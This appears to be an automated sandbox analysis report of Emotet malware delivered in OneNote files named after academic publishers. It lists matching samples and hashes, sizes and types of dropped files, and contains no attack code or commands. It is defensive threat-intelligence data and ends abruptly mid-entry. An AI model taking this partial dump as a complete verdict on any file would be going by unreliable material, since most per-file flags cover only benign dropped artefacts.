Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll | INNOVINC.one | malicious | Emotet |
 | Insight_Medical_Publishing_2.one | malicious | Emotet |
 | Insight_Medical_Publishing_1.one | malicious | Emotet |
 | Insight_Medical_Publishing_3.one | malicious | Emotet |
 | Insight_Medical_Publishing_4.one | malicious | Emotet |
 | OMICS_Online_1.one | malicious | Emotet |
 | Insight_Medical_Publishing.one | malicious | Emotet |
 | Omics_Journal.one | malicious | Emotet |
 | OMICS.one | malicious | Emotet |
 | OPAST_GROUP_1.one | malicious | Emotet |
 | OPAST_GROUP_LLC.one | malicious | Emotet |
 | OPAST_GROUP.one | malicious | Emotet |
 | Opast_International.one | malicious | Emotet |
 | opastonline.com.one | malicious | Emotet |
 | Opast_Publishing_Group_1.one | malicious | Emotet |
 | Opast_Publishing_Group.one | malicious | Emotet |
 | omicsonline.net.one | malicious | Emotet |
 | report_03_16_2023.one | malicious | Emotet |
 | 2023-03-16_0923.one | malicious | Emotet |
 | report_03_16_2023.one | malicious | Emotet |
                                                                                                                                                                                                          Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):62582
                                                                                                                                                                                                          Entropy (8bit):7.996063107774368
                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                          SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                                                                                                                                          MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                                                                                                                                          SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                                                                                                                                          SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                                                                                                                                          SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                          Entropy (8bit):3.1335351732898324
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:kKrl4ry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:zlwCvkPlE99SNxAhUext
                                                                                                                                                                                                          MD5:DCB4E98CB1058F23A638D93D216701E7
                                                                                                                                                                                                          SHA1:55F71A963AA9DFE25E29ED77073D57D0230A23F1
                                                                                                                                                                                                          SHA-256:1DB8E8A0AA41CE73675125E9DAC78C4DD79D99630B2564E4446409388B500415
                                                                                                                                                                                                          SHA-512:A7ED2DAFE01C944CED0268A931A8EA6A5F7DF0BEF0EA6C87666B6E608A3EC0952BC637313782ADDC1E54FF4A06AAC9125E80335A453BFBE451FBE52CB140A830
                                                                                                                                                                                                          Malicious:false
Preview:... http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "0d2f929a74bd91:0" ...
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):154907
                                                                                                                                                                                                          Entropy (8bit):5.352022360033273
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:z+C76gfYBIB9guw6LQ9DQl+zQxik4F77nXmvidlXRpE6Lhz67:ycQ9DQl+zrXgb
                                                                                                                                                                                                          MD5:DC93E9C1B0FF9BC79B8F5E80B39C62BB
                                                                                                                                                                                                          SHA1:36BC533DC13A2B922200BF4FFB46C500411AC3CE
                                                                                                                                                                                                          SHA-256:20D0CE899EB11C2F3AEF2AF12C12AD0E2339DE269B6881B00F1FB9F89091842E
                                                                                                                                                                                                          SHA-512:9ADAC6D82451F918FADB83014734550A3354DE69815DB25DEF1513A9FAFE4DD0BAED0573D706CEC41FAD9181A8BCC3B8704906DEAC97DA952B9D89BF374BA021
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-03-17T08:22:51">.. Build: 16.0.16310.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):70280
                                                                                                                                                                                                          Entropy (8bit):0.16140040305041542
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:BYyfB0FoOLqVsC32vDiqB9VMrcA8XcEfswk:BnBeoOcHQH2PU1swk
                                                                                                                                                                                                          MD5:42C11E480454CC2E194A810F5AB823E0
                                                                                                                                                                                                          SHA1:FDEACE97C68AFDE02DE468A2C0C371BD61F40A72
                                                                                                                                                                                                          SHA-256:D68AC5AE5C2126604CA210BBB9F5845EE537D3DA464DF6FF2274A81080245012
                                                                                                                                                                                                          SHA-512:A4869A8214164D07E32B2AEBEBEC8797BF5EB3EFB5F85BDFC2EBCB7343D083C0BEF0AEE6AE32E69FD9C8A80B6251919CC17882702EEA4D395785C33B86CB7F98
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
